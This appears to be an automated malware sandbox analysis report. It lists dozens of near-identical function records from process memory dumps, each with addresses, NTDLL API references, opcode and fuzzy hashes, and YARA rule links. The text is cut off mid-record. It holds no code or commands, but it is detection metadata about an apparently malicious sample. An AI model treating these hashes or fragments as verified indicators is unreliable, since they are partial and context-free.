API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 46dc9ea4e442727eb5b5d4772a7584e153c80c694dd772377cc7b05b0e6bfb13
Instruction ID: 9a2316cbf7401e6fd7ce49d83feb81792687d68a9ef7246059f880c0cb0875bb
Opcode Fuzzy Hash: 46dc9ea4e442727eb5b5d4772a7584e153c80c694dd772377cc7b05b0e6bfb13
Instruction Fuzzy Hash: CDC1A074E00218CFDB64DFA5C954B9DBBB2BF89304F2081AAD809AB355DB356E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 05974108, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 059741D3

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c10652440c56213087304523e1ecb3e7d93e98b9c842ceacfdc84ec01462a09d
Instruction ID: 82bfece8b536b019562bd38a8d3e8ee54e6bed1e75604409577ad211fb861b4c
Opcode Fuzzy Hash: c10652440c56213087304523e1ecb3e7d93e98b9c842ceacfdc84ec01462a09d
Instruction Fuzzy Hash: 68C19F74E00218CFDB64DFA5C954B9DBBB2AF89304F2481AAD809AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 05973858, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05973923

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: de4211f75aac52466f30deaf4589c968f79a8e06d3567b0fc164fa0b3ef13c9a
Instruction ID: 9012fbb61ad03bbb6be383c4b462420eeb3f140f3af411065bc6a8f47393c107
Opcode Fuzzy Hash: de4211f75aac52466f30deaf4589c968f79a8e06d3567b0fc164fa0b3ef13c9a
Instruction Fuzzy Hash: 8BC1A074E00218CFDB64DFA5C944B9DBBB2BF88304F2485AAD809AB355DB356E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 059763F0, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 059764BB

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b66244e7d93a2b83899a2c93e39868891eca3ed09b4312da672762d601b9ddac
Instruction ID: dba964536d0f50b83da3d557995c768a87c67620fa41951d23e5eb8c979c5e24
Opcode Fuzzy Hash: b66244e7d93a2b83899a2c93e39868891eca3ed09b4312da672762d601b9ddac
Instruction Fuzzy Hash: 62C1A074E00218CFDB64DFA5C954B9DBBB2BF89304F2481AAD809AB355DB356E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 05972B50, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05972C1B

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e7f27a688010300c11ed89cd69766580d8b01ac605fe1491b8f312f324ba4f7b
Instruction ID: 66d913e36af6f1fed394f36d360a0145d58c01f39e2b8ee470feb45f3b12abb9
Opcode Fuzzy Hash: e7f27a688010300c11ed89cd69766580d8b01ac605fe1491b8f312f324ba4f7b
Instruction Fuzzy Hash: A5C1AF74E00218CFDB64DFA5C984B9DBBB2BF88304F2081AAD809AB355DB355E85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 05975B40, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05975C0B

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ac5819732a8936115054bcfbf293bff2d82866da0604b7d328762f65551edb0d
Instruction ID: 41fb5026b9754ca56b2e8f83063365499428841ca8eb33de713891e3fadcfcf3
Opcode Fuzzy Hash: ac5819732a8936115054bcfbf293bff2d82866da0604b7d328762f65551edb0d
Instruction Fuzzy Hash: D5C1AF74E00218CFDB64DFA5C944B9DBBB2BF88304F2481AAD809AB355DB356E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05975290, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0597535B

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 1f60e4234076ec8e85713cb8c331c8529280bd394af0c0c9c0c1a66252156d75
Instruction ID: 312d9dc5018202ef8f550a5bfb53487e7f4fbdd534b48863cc3d7ffe7508618a
Opcode Fuzzy Hash: 1f60e4234076ec8e85713cb8c331c8529280bd394af0c0c9c0c1a66252156d75
Instruction Fuzzy Hash: DCC19074E00218CFDB64DFA5C954B9DBBB2BF89304F2081AAD809AB355DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0594A998, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594AA63

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f9cfdaf67db3398681a1d82cc077f5f8c82b3447eb35981ade58d828e9b71bc2
Instruction ID: 73eca21aa752bd18916988e5761fc0ebaad01f3d0a3d9eff4af9fb72a05ffcff
Opcode Fuzzy Hash: f9cfdaf67db3398681a1d82cc077f5f8c82b3447eb35981ade58d828e9b71bc2
Instruction Fuzzy Hash: D1C1A074E00218CFDB64DFA5C994B9DBBB2BF89304F2081A9D809AB365DB355E85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 05948F88, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05949053

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9c8f48af1e7df945a530e28d27f7535ae20fd615b94d4a6bd4d2d93ed117440c
Instruction ID: 928697b3c81ef26b029389619407d75cb9ceb85bb5bdc0b9a6267b8b8e5df638
Opcode Fuzzy Hash: 9c8f48af1e7df945a530e28d27f7535ae20fd615b94d4a6bd4d2d93ed117440c
Instruction Fuzzy Hash: DAC19E74E00218CFDB64DFA5C994B9DBBB2AF89304F2081A9D809AB355DB356E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0594DDB8, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594DE83

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 52a4d9b62ff556439b537262cb8c880e565163876261106ecaebe64d29691f0d
Instruction ID: e573991480e778962d4ca65dcc91650db550ff81d5be11be41cfdc53eda6d103
Opcode Fuzzy Hash: 52a4d9b62ff556439b537262cb8c880e565163876261106ecaebe64d29691f0d
Instruction Fuzzy Hash: BAC1A074E00218CFDB64DFA5C954B9DBBB2BF89304F2081AAD809AB355DB355E85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0594C3A8, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594C473

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a28fa26c282c6da6410659f055fa858ce0720f3c81987404df7f96bcdf029ae2
Instruction ID: 6e1751ed4eeba051451e3fcb1b059a7ebd3ca18428e0389cf6a5ca0d8b539654
Opcode Fuzzy Hash: a28fa26c282c6da6410659f055fa858ce0720f3c81987404df7f96bcdf029ae2
Instruction Fuzzy Hash: 69C1BF74E01218CFDB64DFA5C994B9DBBB2BF89304F2081A9D809AB355DB356E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0594ADF0, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594AEBB

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e9970270748cfe3fc70bd74450fc3ae60e3fa64fcfcd43391d1fe6fa944e3590
Instruction ID: d8693ebac5a465ed8c82b4f656e3a0a44c184c489928c60e74eee18e7d934bf5
Opcode Fuzzy Hash: e9970270748cfe3fc70bd74450fc3ae60e3fa64fcfcd43391d1fe6fa944e3590
Instruction Fuzzy Hash: 6FC1A074E00218CFDB64DFA5C954B9DBBB2BF88304F2081A9D809AB355DB35AE85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 059493E0, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 059494AB

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6be3ced86bc192157ab5f647f70df2c749e35f7fb3d137d286412e76ef1a8732
Instruction ID: 9f554becbc9b4b69224fafd0a208fd56b2e2f6f711ad41fdc015c5976f58bb58
Opcode Fuzzy Hash: 6be3ced86bc192157ab5f647f70df2c749e35f7fb3d137d286412e76ef1a8732
Instruction Fuzzy Hash: 54C1A074E00218CFDB64DFA5C994B9EBBB2BF88304F2481A9D809AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0594D508, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594D5D3

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e136552fb0514b09319b077d12e263ef51655d6cf6536447b801ccbbcf6a0ef4
Instruction ID: 565ad43259cefdba452cee14c5ce5c3c877f0f667edb1ee2e60cea4dc8fee589
Opcode Fuzzy Hash: e136552fb0514b09319b077d12e263ef51655d6cf6536447b801ccbbcf6a0ef4
Instruction Fuzzy Hash: 57C1B074E00218CFDB64DFA5C954B9DBBB2BF89304F2081A9D809AB355DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05948B30, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05948BFB

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 15606621b799a25957f4675b01f5b93d1553bff602805d279e93e7dcbf242b80
Instruction ID: 5afef3befe083128f496df51c46af5c2ab5f1f4e8d3be0b78f20125f5d39ce6b
Opcode Fuzzy Hash: 15606621b799a25957f4675b01f5b93d1553bff602805d279e93e7dcbf242b80
Instruction Fuzzy Hash: DEC1AF74E00218CFDB64DFA5C994B9DBBB2BF89304F2081A9D809AB355DB356E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0594BF50, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594C01B

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f65f9a565ad011176401d2da6ed4068ed672ef87a9ef4ec8b3649789392a4076
Instruction ID: b2e66e2ca7985825ad85297c9c2ccb9b0424a3f25eddc65e462e40141effcec6
Opcode Fuzzy Hash: f65f9a565ad011176401d2da6ed4068ed672ef87a9ef4ec8b3649789392a4076
Instruction Fuzzy Hash: 45C1AE74E01218CFDB64DFA5C984B9DBBB2BF89304F2081A9D809AB355DB356E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0594A540, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594A60B

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 65555b447f7854801c80e5fd7524225b6c1d715193b8eac7822c59032e687a7a
Instruction ID: 1fb0a2beb2fdcda2d40670fe028c1c364ab7024e007f219f445bd01edb30b81f
Opcode Fuzzy Hash: 65555b447f7854801c80e5fd7524225b6c1d715193b8eac7822c59032e687a7a
Instruction Fuzzy Hash: C8C1AF74E00218CFDB64DFA5C984B9DBBB2BF88304F2481A9D809AB355DB356E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0594D960, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594DA2B

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8bc13a0921ff1317fda408c7a95efcbf2673d7efabeae97c9d66d0794dbf8535
Instruction ID: 81f968a647a3d299dc0fbebbb3f7ed9580c269ada0f9d3c02246d2bc80b4b828
Opcode Fuzzy Hash: 8bc13a0921ff1317fda408c7a95efcbf2673d7efabeae97c9d66d0794dbf8535
Instruction Fuzzy Hash: 42C1BF74E00218CFDB64DFA5C954B9DBBB2BF88304F2081A9D809AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 05949C90, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05949D5B

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 937634621268b18cdda6f43c1072619e7047555f11c5d827d0b4b33648ff360a
Instruction ID: a8969dfec6653ece72c3fb7a46c2d09308b158fe01307dce21e39e8fe5df2b58
Opcode Fuzzy Hash: 937634621268b18cdda6f43c1072619e7047555f11c5d827d0b4b33648ff360a
Instruction Fuzzy Hash: DEC1A074E00218CFDB64DFA5C954BADBBB2BF89304F2081A9D809AB355DB356E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0594D0B0, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594D17B

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 899749b27d2a9ca8a3973e2c8e85e1f8a7aeacd0c1f9f0e7a2c15c011f968e59
Instruction ID: 95a3968f6cd314887291b609c10ae0424d7396e11cc30351eb96da9802e9c1fc
Opcode Fuzzy Hash: 899749b27d2a9ca8a3973e2c8e85e1f8a7aeacd0c1f9f0e7a2c15c011f968e59
Instruction Fuzzy Hash: CFC1AF74E00218CFDB64DFA5C994B9DBBB2BF89304F2081A9D809AB355DB356E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0594B6A0, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594B76B

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3790b5481779c11fb25b81a4080dd5d46753d58dc54976ebfc7b8e597fa97a71
Instruction ID: d4b3d16029ca6003e93b19532402abe73aad0f4d29e444702970ca6f1cd65658
Opcode Fuzzy Hash: 3790b5481779c11fb25b81a4080dd5d46753d58dc54976ebfc7b8e597fa97a71
Instruction Fuzzy Hash: 13C1A074E00218CFDB64DFA5C954B9DBBB2BF88304F2481A9D809AB355DB35AE85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 059486D8, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 059487A3

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 1a16f520273bc24d53443770f2e9b0c40fca6c4b77e179a71c5753b8fb33a3f8
Instruction ID: ac985fb09c667f0332f5b2b042fce441ffa63b1a630831fc57a76c5b11e91cb3
Opcode Fuzzy Hash: 1a16f520273bc24d53443770f2e9b0c40fca6c4b77e179a71c5753b8fb33a3f8
Instruction Fuzzy Hash: AEC1BF74E00218CFDB64DFA5C994B9DBBB2BF88304F2481A9D809AB355DB356E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0594BAF8, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594BBC3

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 120a12ca156d5f16680ee68fef33b70c2c0480fb517b7dd8d66c3557b71a564c
Instruction ID: 582cf77136a74ea176d33af75c375a8da70634a8f356a3e128fabbffd04b996f
Opcode Fuzzy Hash: 120a12ca156d5f16680ee68fef33b70c2c0480fb517b7dd8d66c3557b71a564c
Instruction Fuzzy Hash: 86C19074E00218CFDB64DFA5C994B9DBBB2BF89304F2081A9D809AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0594A0E8, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594A1B3

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 5680d0c13233a6ff1b6ac4549fda564a4c453e4ee3b8449d7812a41c1f4587a6
Instruction ID: f9bc013d37f968c958a562476c8dbbf3b99d1bff1d92ba9e1c5956b2d0750802
Opcode Fuzzy Hash: 5680d0c13233a6ff1b6ac4549fda564a4c453e4ee3b8449d7812a41c1f4587a6
Instruction Fuzzy Hash: C3C19E74E00218CFDB64DFA5C994B9DBBB2BF89304F2081A9D809AB355DB356E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0594C800, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594C8CB

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 51487f79567232b992275a18e5a5dd51db2550b0eb9e1e032ae83eb41907291a
Instruction ID: 63b422741269428ff02b6726533ad59feb102b891c2627f73ca8989e007da0a6
Opcode Fuzzy Hash: 51487f79567232b992275a18e5a5dd51db2550b0eb9e1e032ae83eb41907291a
Instruction Fuzzy Hash: C1C1BF74E01218CFDB64DFA5C994B9DBBB2BF88304F2081A9D809AB355DB356E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 05949838, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05949903

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0e7a1def03ee686b63ab32c49073733b3d80693028eceb43435329461532596b
Instruction ID: 93bb935578effb04df72904589c1862ce5a292df6cc963cdc14fb454b5299c90
Opcode Fuzzy Hash: 0e7a1def03ee686b63ab32c49073733b3d80693028eceb43435329461532596b
Instruction Fuzzy Hash: B2C19F74E00218CFDB64DFA5C994B9DBBF2AF89304F2081A9D809AB355DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0594CC58, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594CD23

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d318360c6c88c7e5dc95c1273c830dc443a6d7e473f13b74a58567f20b0f3d8c
Instruction ID: d753089844fc4fc9240393cf03f7dbaaa8f9daaf98affad4fe58655e2ab80f89
Opcode Fuzzy Hash: d318360c6c88c7e5dc95c1273c830dc443a6d7e473f13b74a58567f20b0f3d8c
Instruction Fuzzy Hash: CCC19074E01218CFDB64DFA5C954BADBBB2BF89304F2081A9D809AB355DB356E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0594B248, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594B313

Part of subcall function 05948140: KiUserExceptionDispatcher.NTDLL(000000FF), ref: 059482A2

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8b5a340007e70b397dceeec6407926dd85ec510d5495c9d7816dcf2a7f106731
Instruction ID: e08d60ab5b1066af5484491dc290b6a480855a1ea13df987aee7d42398d83b02
Opcode Fuzzy Hash: 8b5a340007e70b397dceeec6407926dd85ec510d5495c9d7816dcf2a7f106731
Instruction Fuzzy Hash: 45C19074E00218CFDB64DFA5C994B9DBBB2BF89304F2081A9D809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 059740F8, Relevance: 1.6, APIs: 1, Instructions: 120COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 059741D3

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7f310ac12814efd5591ad0e26b097bf5fb2cd6f5ac4218071b9a9a15b4b7fe63
Instruction ID: b2b7383a7049abac55b2e1c279643b458d76a41d67241ded8aca0743d4d35e6b
Opcode Fuzzy Hash: 7f310ac12814efd5591ad0e26b097bf5fb2cd6f5ac4218071b9a9a15b4b7fe63
Instruction Fuzzy Hash: 4F41D371E0024C8BDF18DFAAD9446EEBBF2EF89304F24916AC418BB255EB355946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 059733F0, Relevance: 1.6, APIs: 1, Instructions: 120COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 059734CB

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: da607169ece509e3880fbdc3682cf7ac08800af476529cbbfc20e02ded183e12
Instruction ID: 60be679d39fb85be7b4a77d804d9a60a63f90250400defb81ad34f2c52a2c4fc
Opcode Fuzzy Hash: da607169ece509e3880fbdc3682cf7ac08800af476529cbbfc20e02ded183e12
Instruction Fuzzy Hash: 7741D3B1E0120CCBDB18DFAAD9446EEBBF2FB89304F24956AC418BB254EB355905CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0597384A, Relevance: 1.6, APIs: 1, Instructions: 117COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05973923

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 666f4928a85c43b1087e502f9ee99f5e5240668476a830b79ba7c9eb05da37e2
Instruction ID: 4fa1a5b32a598c03d6032c4ad79090af4f61b0b93117e596e07e68ff12a5dee3
Opcode Fuzzy Hash: 666f4928a85c43b1087e502f9ee99f5e5240668476a830b79ba7c9eb05da37e2
Instruction Fuzzy Hash: AA41E171E01208CBDB18DFAAD9446EEBBF2EB89304F24D56AC418BB258DB355906CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0234C1D7, Relevance: 1.6, APIs: 1, Instructions: 113libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0234C285

Memory Dump Source

Source File: 00000002.00000002.926566952.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c68057f6c4856a476ec2ffe44460159ac87b5b6300571e588d154868c00ad67d
Instruction ID: ca7fe4f32c6b85e3271ffbe9c83284951314de18fe0b27009c5ec8e499d2452b
Opcode Fuzzy Hash: c68057f6c4856a476ec2ffe44460159ac87b5b6300571e588d154868c00ad67d
Instruction Fuzzy Hash: ED51A471E01629CFDB68DF66C840AD9B7F2AF89304F10D5EAD518AB715EB305A86CF40

Uniqueness

Uniqueness Score: -1.00%

Function 059763E0, Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 059764BB

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ffe6c6895918b73f8552140989840ebd4bab47d0cee9475f051e491ac4d6af14
Instruction ID: a9c297313a214e3c8446ef080a6bd04ed380649b516f4931a0aec7c9fcb22ad6
Opcode Fuzzy Hash: ffe6c6895918b73f8552140989840ebd4bab47d0cee9475f051e491ac4d6af14
Instruction Fuzzy Hash: 3941D270E016188BEB18DFAAD954ADEBBF2AF88304F24D17AC415BB258DB355946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 05975B30, Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05975C0B

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d18cf161eda75179d87c6314021e1defa3b2a9b265fff93fead0acefcc5ae538
